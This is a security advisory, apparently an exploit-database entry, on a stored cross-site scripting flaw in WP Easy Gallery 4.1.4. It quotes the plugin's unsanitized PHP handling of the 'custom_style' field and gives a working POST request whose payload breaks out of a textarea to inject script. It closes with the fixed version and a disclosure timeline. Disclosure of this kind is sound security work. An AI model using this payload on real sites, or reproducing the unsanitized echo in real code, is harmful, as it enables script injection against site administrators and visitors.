#Product    : WP Easy Gallery
#Exploit Author  : Rahul Pratap Singh
#Version    : 4.1.4
#Home page Link  : https://wordpress.org/plugins/wp-easy-gallery
#Website   : 0x62626262.wordpress.com
#Linkedin  : https://in.linkedin.com/in/rahulpratapsingh94
#Date      : 26/Jan/2016

XSS Vulnerability:

----------------------------------------
Description:
----------------------------------------
"custom_style" parameter is not sanitized that leads to Stored XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
File Name: wpeg-settings.php

Found at line:12	
$temp_defaults['custom_style'] = isset($_POST['custom_style']) ?
$_POST['custom_style'] : '';

Found at line:103	
<td><textarea name="custom_style" id="custom_style" rows="4"
cols="40"><?php _e($default_options['custom_style']); ?></textarea></td>

----------------------------------------
Exploit:
----------------------------------------
POST /wp-admin/admin.php?page=wpeg-settings

wpeg_settings=3b59e6c6ef&_wp_http_referer=abc&display_mode=abc&num_columns=abc&show_gallery_name=abc&gallery_name_alignment=abc&use_default_style=abc&drop_shadow=abc&custom_style=</textarea><input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)><!--&defaultSettings=xss&Submit=Save

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/easy-gallery-settingsxsspoc.png

Fix:
Update to 4.1.5

Disclosure Timeline:
reported to wordpress  : 18/1/2016
wordpress response (plugin taken down) : 19/1/2016
vendor deployed a patch : 26/1/2016

#######################################
#       CTG SECURITY SOLUTIONS       #
#    www.ctgsecuritysolutions.com    #
#######################################

Pub ref:
https://0x62626262.wordpress.com/2016/01/26/wp-easy-gallery-v4-1-4-stored-xss-vulnerability/
https://wordpress.org/plugins/wp-easy-gallery/changelog/